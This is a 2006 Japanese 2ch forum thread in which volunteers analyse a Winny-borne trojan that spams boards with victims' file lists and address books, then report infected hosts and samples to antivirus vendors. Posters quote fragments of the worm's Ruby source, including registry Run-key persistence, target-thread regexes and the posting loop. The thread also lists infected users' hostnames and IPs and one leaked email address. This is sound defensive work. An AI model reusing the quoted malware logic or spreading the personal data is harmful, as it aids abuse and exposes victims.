■ウィルス爆撃相談所&焼き処【RockBBQ】
レス数が950を超えています。1000を超えると書き込みができなくなります。
ここはウィルス等を利用した爆撃等の相談所です。
ウィルス感染ホストの報告と焼き処を兼ねます。
#削除依頼は、削除整理板へお願いします。
#ここでは芋掘りは行いません。専用スレでどうぞ。
【関連スレ】
【BBQ&BBM12本目】公開串登録所【ピンポイント規制】
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/
bbs.cgi再開発プロジェクト7
http://qb5.2ch.net/test/read.cgi/operate/1130918407/ (アニメ) 星方天使エンジェルリンクス 第09章 「良禽択木」 (LD 640x480 WMV9 QB93 120fps).avi,oos5qf7hrv,0,0,89f53b68715041cd3edad976b7792ef9,1
が落ちてこない・・・
ダウンロード板の爆撃種類
1.〜まだぁ〜? の爆撃 (書き込み内容が違う亜種有り)
2.>849 のようなやつ (亜種も?)
3.tab1.txt,tab2.txt,download.txtのファイル内容を一行ごと書き込む (Symantecからウィルス判定)
4.ほかにあったっけ? ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/235
235 :0 nissin45079.ccnw.ne.jp :2006/03/30(木) 00:13:15 ID:XXsBPx4M0
パピヨン:*eiryu04jp@hotmail.co.jp
以下省略
確認してませんが>>849と同じく暴れまわってると思われます。
・・・地方のCATVなのによりによって同じプロバの感染者を見るとは・・・
ちなみにこちらは↑の通り 参考までに
うちのプロバはなかなかホスト名が切り替わりません。MACを変更するとすぐにIPが変わりますが。
・・・あーあー自分のホスト名ばらしちゃったw 人探ししてるのに、ウイルスファイルの情報貼り付けてどうしたいんだろう。 なんだか、錯綜しているようだなぁー。
・ウイルス本体の検出状況とか
・どのタイプの書き込みがどれとかー、そういう整理
・で、どれが未決なのかとかの整理
など
をまとめてくれる人
をやれる人待ちのようで。
>>823>>832>>839
>やってもいいなーという人がいたら、ここで宣言でもメールでも
>いーんで連絡いただければー。 書類が揃ってないから対処しないお役所仕事のようですなw
ボランティアが大変なのもわかってはいますが、善意の通報者とボランティアとの間に
おかしな距離があるのが気になります。 事態はどんどん先に進んでいます。 > ・ウイルス本体の検出状況とか
現在発見されているウイルス(らしき物)は全て検出されます
> ・どのタイプの書き込みがどれとかー、そういう整理
ageタイプとsageタイプの2種類
ウイルス自体が違うのか環境によってagesage切り替えるのかは不明
ageタイプはスレタイが/winny|share|\d\d\d\d/iにマッチしdat番号が古いもの
sageタイプはスレタイが/winny|share/にマッチしdat番号が古いもの
に爆撃
> ・で、どれが未決なのかとかの整理
不明 うーん。情報整理をやるぞー、という人はいないのかなー。
そうすると、そういう情報まとめるスレなりをやはり別に作る
必要あるのかなー。そこに必要な情報を集約していくとかー。
>>855
心配してるのは情報の漏れとゆーか、そういう部分ですー。
通報漏れとかー。
アンチウイルスで検出できるものは、もう心配ないわけですがー、
(それを集めてきても意味はないですー。ユーザーへの注意喚起は
また別の話なのでー)、実際の所検出されるものがどーゆー荒らし方を
してるのかと(投稿パターンがわかれば、対応状況が整理できる)、
まだ本体が発見されてないものを、投稿開始時期から絞っていけるかなーと。
wikiに整理したらいーのかなー。投稿パターンごとにー。
>>856
どうもですー。
そういう感じのを、もっと個別に詳しく煮詰めていければなーと。 まとめを入れた報告あきらめたー。 人→1
現在は無差別のみ
裏でこそこそとやってるだけ あー、パターン毎にテンプレで整理すればいーのかなー。
例えばこんな感じー。亜種はどんどん区別するって感じでー。
【通称】 ●●● typeE
【爆撃開始時期】 2006/03/01
【投稿の特徴など】
・sageで書き込む
・○○.txtの内容をランダムに投稿
・一番上の○○というタイトルスレに投稿
・・・・
・・・・
【本体確認状況】 2006/3/12に確認(通報済み)
http://qb5.2ch.net/test/read.cgi/sec2chd/***********/256
【アンチウイルス検出状況】
Norton × ・・Torojan.TypeB
NOD ◎ ・・・・
・
・ わしもあきらめた。
複数のウィルス(迷惑プログラム含む)の投稿がどんどん混在していく状況では
apache の access_log でも見ないと判別不能だろうね。
名無しに出来る事は少ないよ。あの板にはおそらく妨害者も居るしね。 >>858,860
>>832
>必要ならキャップも発行してもらえるよーに管理人さんにも
>お願いするつもりでいますー。
って、言っていますしー。 マルチポスト失礼(対策スレにも書き込みました)
★ウイルス名
Trojan.Kakkeys.Dだと思う。発見日も米国時間で2006年3月23日だからまず間違いない。
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html
★通称: 未定(以下候補)
・徹也ウイルス ←投稿された内容
・スッポンウイルス ←一度くっつくと離れないから
・レイニー・ウイルス ←reとnyに雨のように降り注ぐので
・埋めルス ←どんどん埋め立てていくから
・アーシェスHiguchi ←レスの内容?
・腐海 ←腐海のようにどんどんスレを飲み込んでいくから
★症状(概要)
・2ちゃんねるダウンロード板に
イ)Winnyがインストールされているフォルダ内の、Tab1.txt、Tab2.txt、download.txtの内容
ロ)アドレス帳に登録されたアドレス、メッセンジャーに登録されたアドレス
ハ)PCに登録されたユーザー名
を書き込む
★症状(詳細)
A)スレを上げて書き込む
・スレタイに「Winny」を含む、一番古いスレ(dat番号が一番若い)
・スレタイに「Share」を含む、〃
・スレタイに四桁の算用数字を含む、〃
の条件を満たすスレに並行してレスを送る。内容は、イ)、ハ)
B)スレを下げて書き込む
・スレタイに「winny」を含む、一番古いスレ(dat番号が一番若い)
・スレタイに「share」を含む、〃
・スレタイに四桁の算用数字を含む、〃
の条件を満たすスレに並行してレスを送る。内容は、イ)、ハ)
C)fusianaして書き込む
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/l50
に対してレスを送る。内容は、ロ)
頻度は、A) >> B) >> C)
★ウイルスの実体
・Share、Winny共に使用してないので分かりません。候補はいくつか上がってるようですが。
★各社の対応状況
・実体を特定してないので不明。ageが現れたのはsageが来たあとなので亜種の可能性もあり お忙しいところ申し訳ありませんー
昨日より同人板にもダウン板と近似タイプのage爆撃が発生している模様です
感染者のSearch.txtかDownload.txtの中身を投下
管理人が閲覧者に質問するスレ
http://comic6.2ch.net/test/read.cgi/doujin/1143633663/
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/
他
一覧の上にあるスレが爆撃受けてるかもです。 補足
・ageは大文字小文字関係なく書き込むか否かは不明
・「ny」や「re」だけではスルーしました。
・ユーザー側での対策法はありません。攻撃を事前に予測することは可能ですが
・subject.txtで1000を超えたことを判定しているようです。
空爆されたスレがsubject.txt上で999で止まったときに(実際には1000になった)、
dat落ちするまで次の攻撃対処に移動しなかったので間違いないです。
>>863
作者が調子に乗ってキーワード変えて他スレを爆撃し始めたのか、
ソースが流れてて誰かが改造して流したのか
人のいるところならいいが、過疎狙われるとヤバイ >>863
一番新しいスレと一番古いスレを攻撃してるっぽい
キーワードは「同人」と「スレ」が臭い。
板に糞スレ立てましたスマソ。
スレ 同人 スレ 同人 スレ 同人
http://comic6.2ch.net/test/read.cgi/doujin/1143698200/l50
投稿毎に番号入力を強制するようにはできないの?
多少面倒でも爆撃で埋められるよりはマシじゃん 今日は・・・
ID:UHc3otES0 205 res
2006/03/30 00:00:17 【album】【hiphop】 Nujabes - Metaphorical music.zip,,0,0,a12a1d14297d6b068c294782d07bbf28,1
2006/03/30 00:02:53 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 00:08:46 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
2006/03/30 00:12:05 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 00:18:39 【HIPHOP】【シングル】【洋楽】REMIX---R&B.Hip-Hop Mix 2 - (Ja Rule Shaggy Destiny's Child Mya Next Ruff Endz Pink Jay-Z).mp3.lzh,,0,0,e11d113fa2a5d648d6544c12b2056608,1
ID:tCUSJrP30 472 res
2006/03/30 05:39:42 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 05:43:38 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 05:44:17 【HIPHOP】【シングル】【洋楽】eminem redman snoop dogg pharoahe monch krayzie bone dmx eve b.g. jurrassic 5 2pac bizzy bone method man big punisher jadakiss krs-one - hip hop mix 1(1)(1)(4).mp3,,0,0,68c276011bc9c51b389261d37c97c03b,1
2006/03/30 05:50:06 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
>>867
フリーメールの垢取得のときみたいにって事?
数値を画像で表示させるから、専用ブラウザは対応が必要になりますね 対策方法
・Rock + バーボン
・特定のIDを狙いうち >>869
そうそう、あんな感じで
全板空爆されたら、そんな方法しかなさそうだし
>>870
やれそうならやってほしいっすね
せめてスマンテックが対応するまでだけでもいいから >>871
プロバイダへの通報も・・・(まぁ、相手がいることですし。。。数も多いし。。。
>>872
メンテを含め、鯖に負担が掛かるでしょうね。
導入しても即ウイルス作者が対応するでしょうけど。。。
傘スレが機能不全になってからBooできなくなっちゃったぁ。
sage対象までは追いきれないぽ。。。 >>862
かなりイメージに近いですー。
それをパターン別に分類していけばいーかなーと。
そしてパターン別に対応状況確認ってことでー。
すでにもう見られなくなってるパターンもあると思うんですよねー。
そういうのを時系列で整理も必要かなーと。
とりあえずは現時点で書き込んでるのを整理してから、
必要に応じて過去に遡る感じでー。
>>871
ランダムすぎるのでRockは無理ですー。
>>872
>せめてスマンテックが対応するまでだけでもいいから
ウイルス本体さえ送れば、アンチウイルス会社はそこそこ
迅速に対応してくれてるようですー。
だから探したものを迅速に、漏れなく送る必要があるなーと。 【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
ここのスレ、k9Tzvsz7が昨日の深夜、WRuVwZkFが朝から一人で攻撃していますね。
同一人物だとすると、他の攻撃スレには何人かいるので、何種類かの亜種がいる可能性大。 >>874
勇気スレチェックしているようにしてますが
ロダではそれらしいのはまだ出てないようです。 >>874
今のRockには期待してない
新・Rockは1回でも書き込もうとするとバーボン逝き (Rock登録の時に最低**文字以上は必要) ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/292-
hbs80006.hbs.ne.jpがしつこく書き込んでる。
症状が今回のウイルスなので、焼いてください。
いきなり手に入った
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
require 'zlib'
def self_destructive board
#爆撃終了
board.settings['BBS_TITLE'] == 'この板は腐ってる@2ch掲示板'
end
(省略)
load_exec 'AntiDojin.rb.zz'
あふぉかと・・・ zlib使ったこと無いし
perlからzlibの使い方も知らぬ
(中にある)ファイルの日付は昨日(03/29)と今日(03/30 8:50)だった
少し追加
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip kTrEVbYUbc 6,502,611 8a31ae38742cea2d46eb2bb054d3964c
(一般コミック・雑誌) [ジャンプ] [2006-18] テニスの王子様 Genius307.zip k7t40jJlVq 3,069,394 384fa751e8af899e950056e088899f05
以前にも見たような感じでファイルが・・・ >>879
これは送りましたかー?
なんせwinnyが出来ないとファイルも取得できないんですよねー。
そこがネックだったりしますー(うちのプロバイダはwinny遮断してるんでー)。 http://www.google.com/search?num=10&hl=ja&c2coff=1&q=bbs-menu-for-2ch+%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%E9%80%9F%E5%A0%B1&lr=lang_ja
で検索
<A HREF=http:\/\/([!-~]+)\.2ch\.net\/([!-~]+)\/>#{bbsname}<\/A>
にマッチしたやつを取得
['download.txt', 'tab1.txt', 'tab2.txt'].each{|x|
これは・・・
def startup filename
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('AntiDojin Extended by ', filename)
}
end
む。
↓続く コミック系・mp3・ゲームやエロゲーのNoDVDパッチとかで
毎週亜種が増えていく予感
このウイルス作者はダウソ(同人も?)に恨みでもあるのかな?
爆撃のあった板に2get禁止のアレでウイルス対策ソフト使いましょうみたいな
宣伝したほうがいいんじゃないかな
それと2chのトップにウイルス対策ソフトを使えと書く (専ブラ使ってない人向けに)
ウイルス感染者が全員2ch見てる訳ではないと思うけど何もしないよりはいいかと
焼け石に水かもしれませんが・・・ winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
rusu_thre = board.include_title(/ういるす|うぃるす/i)
$exename = 'c:\\:滝川クリトリスv3.exe'
$dataname = 'c:\\:滝川クリトリスv3.dat'
!!
if Time.now.to_i < 1143129600
爆撃の時間指定?
board = TwoChannel::Board.new('comic6', 'doujin')
SymantecAntiVirus 2006/03/27のやつで反応無しっと ぺたぺた
use Compress::Zlib;
$ZoneProcessfile = "e2.bin"; #(該当部分を抜き出しておくこと)
($ZoneProcesssize) = (stat($ZoneProcessfile))[7];
open INFILE,$ZoneProcessfile;
binmode(INFILE);
read(INFILE,$ZoneProcessbindata,$ZoneProcesssize);
close INFILE;
$dest = uncompress($ZoneProcessbindata);
open OFILE,">ruby.rb";
print OFILE $dest;
close
何かの流用とか言うな
まとめ
昨日から同人板へ爆撃が始まったやつっぽい アンチウィルス通報部隊へ
http://kasamatusan.sakura.ne.jp/ → なな → nana11600.zip
受信 : angel
解凍 : rovirus >>885
1143129600 = 2006/03/24(Fri) 01:00:00 JST >>884
その理屈で言うならですねー、ウイルスソフトは結構もう
普及してると思うんですー。
けど、パターンファイルに登録されない限り検出されないんですねー。
だから広がっちゃってるってのが事実だと思うんですー。
検出されるよーにするには、ウイルス本体を送って対応してもらう
必要があるわけですー。
パターンファイルの更新はー、早いところだと毎日やってますからー、
発見したら1日でも早く送るってのが次善の策だと思うんですー。 ***** 31ruby.rb
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼|/i)
774: if share_thre.empty?
***** 33RUBY.RB
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
774: if share_thre.empty?
*****
***** 33ruby.rb
852: begin
853: TwoChannel::set_user_agent
854: board = TwoChannel::Board.new('comic6', 'doujin')
***** 34RUBY.RB
852: begin
853: TwoChannel::set_user_agentdownloa
854: board = TwoChannel::Board.new('comic6', 'doujin')
*****
なんというか
バグ入りで(略 同人に「ういるす」は立ってないな。いまのところ
試しに立ててみる?たぶん
>>862のロの投稿が始まると思うが
焼くことは可能になるけど、暴露されてしまうという諸刃の刃 ビンゴっぽいね
【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
↓
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/
この正規表現がいまいち良く分からない。見た目と違ったマッチになるけど間違った記述なのかな? ・・・・上で貼られたウイルスの感染者はID:WRuVwZkFしかいない気がする。
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/l50
ここにもID:WRuVwZkFがいるが、複数感染してる可能性がある。 >>831の続きですー(comic6も追加)
3/29 12:58:11〜3/30 17:27:15(tmp6)
〜3/30 17:28:07(comic6)
-tmp6-
221-186-221-200.ip1.george24.com 213件
p36003-adsao12honb4-acca.tokyo.ocn.ne.jp 105件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 78件
phoenix.aitai.ne.jp 21件
softbank219062040169.bbtec.net 12件
softbank219052178096.bbtec.net 11件
dhcp-ubr1-0427.csf.ne.jp 11件
cable153064.ont.ne.jp 6件
nissin45079.ccnw.ne.jp 5件
N029029.ppp.dion.ne.jp 3件
135.169.hinocatv.ne.jp 2件
-comic6-
blackcat.reslife.okstate.edu 20件
p927305.aicint01.ap.so-net.ne.jp 15件
nissin45079.ccnw.ne.jp 3件 >>895
どーゆースレタイのスレを立てればいーか整理してー、
理由も添えて、ここに申し込んでみてくださいー。
【実験】書き込めなスレッド スレッド924について2
http://qb5.2ch.net/test/read.cgi/operate/1075184383/ >>894
ISPの共有ホスト (多数)
phoenix.aitai.ne.jp 21件
マンションの共有ホスト (数人)
221-186-221-200.ip1.george24.com 213件 def main_write board, messe #ぎりぎりか?
nanasi_name = board.settings['BBS_NONAME_NAME'] == '' ? '[名無し]さん(bin+cue).rar' : board.settings['BBS_NONAME_NAME']
name_max = board.settings['BBS_NAME_COUNT'].to_i
nanasi_name = nanasi_name[0, name_max]
targets = []
winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
if winny_thre.empty?
targets << board.max_res
else
targets << winny_thre.min{|a, b| a.key - b.key}
end
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
if share_thre.empty?
targets << board.oldest
else
targets << share_thre.min{|a, b| a.key - b.key}
end
rusu_thre = board.include_title(/ういるす|うぃるす/i)
if rusu_thre.empty?
#targets << board.first
else
targets << share_thre.min{|a, b| a.key - b.key}
end
targets.unshift(*(board.sort_old[-2, 2]))
targets.each{|x|
unless x.write(nanasi_name, '', messe.rnd)
x.board.tmp_wait
end
}
end >>894 下記以外を焼きました。
共用
> phoenix.aitai.ne.jp
> 221-186-221-200.ip1.george24.com >>898
定義の部分がないから妄想で
winny_threに(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)とマッチするスレを入れる。
もし、winny_threが空っぽなら
条件を満たすものの中からmax_res(dat番号が一番大きい場所?)を狙う
否なら
キーワードを満たす一番古いスレを狙う
share_threに(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)とマッチするスレを入れる。
もし、share_threが空っぽなら
一番古いスレを狙う
否なら
キーワードを満たす一番古いスレを狙う
rusu_threに(/ういるす|うぃるす/i)とマッチするスレを入れる
もし、rusu_threが空ならば
コメントアウトしてるのでなし
否ならば
条件を満たすものの中で最古のものを狙う
-----
ただ、マッチングにバグがあるみたいだからほぼ無差別に最新2スレを狙ってるみたい。 >>900
fusianaしなかった串ではないやつも焼けるんですか?
同人のほうは止まったようです。 >>885
> $exename = 'c:\\:滝川クリトリスv3.exe'
> $dataname = 'c:\\:滝川クリトリスv3.dat'
このv3ってなに?
アンラボのV3 ウイルスブロック v3antinny.exeに対抗してるの?
アンラボの販促とか? >>902 えと、ホスト分かりませんと、私達の方ではどうする事も出来ないです。。。 >905
フシアナ+アドレス帳の内容ばらまき型ウィルスはそこをターゲットにしてるよう
ですね
このタイプはまた違った種類なのかなぁ? http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html
の亜種と思われるので、同一のウイルスの動作だと思います。
IDで他の爆撃スレを検索するとヒットするので使えるかと。
とりあえず、松元さん本人か家族のアドレスに警告メールを送信しておきました。 一応報告しといた方がええのかな。
>>887をsymantecに提出しました。
ttps://submit.symantec.com/retail/
返事が来たら追って報告します。 >>887
フリーのAVソフトウェア
AVG PSW.Generic.AGB(対応済み)
BitDefender に提出
ewido に提出
virustotalではKasperskyは対応済みだった。 nod32,avast4は未対応。 シマンテック・キングソフト・マカフィー・avast!・某の人に送りました。 >>887 トレンドマイクロさんにブツを送りましたー。 >>894の続きですー
3/30 17:27:15〜3/31 13:39:22(tmp6)
〜3/31 11:08:46(comic6)
-tmp6-
p8082-adsau12honb4-acca.tokyo.ocn.ne.jp 199件
phoenix.aitai.ne.jp 121件
144.114.168.203.megaegg.ne.jp 89件
p8081-ipad407marunouchi.tokyo.ocn.ne.jp 52件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 36件
p7231-adsau12honb4-acca.tokyo.ocn.ne.jp 14件
p8126-ipad63marunouchi.tokyo.ocn.ne.jp 39件
softbank219052178096.bbtec.net 11件
p4169-ipbf05okidate.aomori.ocn.ne.jp 7件
i238241.ppp.asahi-net.or.jp 6件
softbank219062040169.bbtec.net 5件
210-194-24-189.rev.home.ne.jp 5件
nissin45079.ccnw.ne.jp 5件
-comic6-
d-218-40-130-174.d-cable.katch.ne.jp 103件
blackcat.reslife.okstate.edu 30件
p927305.aicint01.ap.so-net.ne.jp 14件
*一部共有ホストも含まれておりますー ipbf05okidate.aomori.ocn.ne.jp
近所でかかった馬鹿がいるのか
なむなむ
共有
phoenix.aitai.ne.jp 121件 >>914 下記以外を焼きました。
共有
phoenix.aitai.ne.jp >>917 お疲れ様ですー
>>914の続きですー
〜3/31 18:09:53(tmp6)
〜3/31 18:12:57(comic6)
-tmp6-
p8126-ipad63marunouchi.tokyo.ocn.ne.jp 30件
p8082-adsau12honb4-acca.tokyo.ocn.ne.jp 29件
d30162c0.tcat.ne.jp 25件
55.114.168.203.megaegg.ne.jp 14件
-comic6-
softbank218122194073.bbtec.net 70件 >>920
お疲れ様ですー
ありがとうございましたー >>908っす
symantecからレスポンスありました。
---
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221.zip
machine: Machine
result: See the developer notes
filename: BLEACH221.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
filename: (一般コミック・雑誌)[ジャンプ][2006-18]テニスの王子様Genius307.zip
machine: Machine
result: See the developer notes
filename: 王子307.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221(3).zip
machine: Machine
result: See the developer notes
filename: 鰤221 .exe
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
---
「Trojan.Kakkeys.Dですた」らしい。。。 >>922
Norton AntiVirus LiveUpdateでも来ました。
Trojan.Kakkeys.D 03/23/06
キングソフトは解析中との返事がありました。 >918の続きです。
tmp6 03/31(金) 18:52:39 〜 03/31(金) 23:57:10
136.119.168.203.megaegg.ne.jp 203.168.119.136
14.46.87.61.ap.seikyou.ne.jp 61.87.46.14
220-213-104-245.pool.fctv.ne.jp 220.213.104.245
a0636.hyper-tsukumi.jp 210.188.114.128
d30162c0.tcat.ne.jp 211.1.98.192
dd37df534.oct-net.ne.jp 211.125.245.52
JJ034185.ppp.dion.ne.jp 211.4.34.185
OFSfa-02p3-147.ppp11.odn.ad.jp 61.209.162.147
OMCfa-01p1-238.ppp11.odn.ad.jp 61.116.143.238
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 220.97.145.36
p9197-adsao12honb4-acca.tokyo.ocn.ne.jp 219.161.140.197
comic6 03/31(金) 18:33:14 〜 03/31(金) 23:59:54
221.net059085201.t-com.ne.jp 59.85.201.221
KHP059140192247.ppp-bb.dion.ne.jp 59.140.192.247
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 60.39.176.24
softbank221039230023.bbtec.net 221.39.230.23
softbank221076082017.bbtec.net 221.76.82.17
>>925の続きですー
〜3/32 14:00:08(tmp6)
〜3/32 14:59:20(comic6)
-tmp6-
59-190-117-92.eonet.ne.jp 154件
softbank221092000083.bbtec.net 34件
OMCfa-01p1-238.ppp11.odn.ad.jp 10件
136.119.168.203.megaegg.ne.jp 9件
p8036-adsau12honb4-acca.tokyo.ocn.ne.jp 7件
softbank218116216024.bbtec.net 2件
14.46.87.61.ap.seikyou.ne.jp 4件
a0636.hyper-tsukumi.jp 2件
-comic6-
softbank220003040058.bbtec.net 72件
TTN202-127-81-29.ttn.ne.jp 70件
p3024-ipbf10akatuka.ibaraki.ocn.ne.jp 8件
softbank221039230023.bbtec.net 6件
221.net059085201.t-com.ne.jp 4件
softbank219012020092.bbtec.net 6件
softbank221089108029.bbtec.net 2件
KHP059140192247.ppp-bb.dion.ne.jp 2件
softbank221076082017.bbtec.net 1件 軍艦焼★さんが提出していましたが念のため提出しましたー
#あともう一つ別のベンダに転送したいのですが本日オフラインのようで。 >>932
お疲れ様ですー ありがとうございましたー
>>933
お疲れ様ですー >>929のTTN202-127-81-29.ttn.ne.jpですが、ケーブルの共有プライベートアドレスなので
もし可能でしたら解除して頂けませんでしょうか…… TTN202-127-81-29.ttn.ne.jpから2chへばっこんばっこんアクセスしている、
ウイルス感染者を始末して証拠を提示すればOK >>937
ケーブル会社に連絡してそのアドレスで2chに連続書き込みしてる人を
処置してもらったほうが早いんじゃないの?
えーと、感染のチェックってみんなどうやってるんだろー?
どんどん撒かれてる亜種についてはー、最新のソフト一つ
程度じゃ検出されないと思うんですけどー。 >>937-939 とりあえず共有の可能性ありなので解除してみました。
#また焼かれても私は無責任で。
>>887 ただいま解析中と中の人からお手紙ありましたー。 >>940
http://hp.vector.co.jp/authors/VA032928/
このソフト入れて通信を監視していれば、意図しない2ちゃんねるへのアクセスに気づくことは可能。 >>941
どうもありがとうございました。お手数掛けて申し訳ありません。
>>938-939
会社の方にも報告しておきます。お目汚し失礼しました。 >>942
をー。結構面白いソフトあるんですねー。
けど、気づいたあとはどうなんでしょうねー。
どこのディレクトリにどういうファイルを作るかとかー、
亜種毎にそんなに違わないなら整理できないですかねー。
>>922の解説にある「C:\[JAPANESE CHARACTERS].exe」
って、具体的にはどんなファイルが作られるんだろー?
>3. Winny プロセスが動作中である場合、これは Winny がインストールされているフォルダ内で次のファイルを検索し、その後そのファイルのコンテンツを C:\[日本語の文字].dat へ保存します。
>
> Tab1.txt
> Tab2.txt
> download.txt
この機能ってー、絞り込みを回避するために感染パソコン
同士で書き込みワードをシャッフルする機能みたいですねー。
これによってターゲットもどんどん変えられるんじゃないかなー。
本体を感染させなくてもー。 そこで報告されてたのは送付されたのかな?
ひっかからないけど削除したって書いてあるけど。 レス数が950を超えています。1000を超えると書き込みができなくなります。
